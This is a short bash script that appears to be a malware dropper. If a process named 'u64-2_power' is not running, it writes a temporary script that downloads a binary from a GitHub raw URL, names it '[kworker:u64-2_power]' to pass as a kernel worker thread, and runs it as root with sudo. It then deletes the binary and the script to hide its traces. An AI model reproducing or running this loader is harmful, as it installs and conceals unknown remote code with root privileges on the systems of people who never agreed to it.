#!/bin/bash
workd=$(ps -ef |grep u64-2_power | grep -v "grep" | wc -l)
if [ $workd = "0" ]; then
	echo "export PATH=.:$PATH
	cd /
	curl -o '[kworker:u64-2_power]' https://raw.githubusercontent.com/jackmoc/update/main/update >/dev/null 2>&1
	chmod +x '[kworker:u64-2_power]'
	'[kworker:u64-2_power]'
	sleep 5
	rm -rf '[kworker:u64-2_power]'" > /tmp/update.sh
	sudo sh /tmp/update.sh
	rm -rf /tmp/update.sh
fi
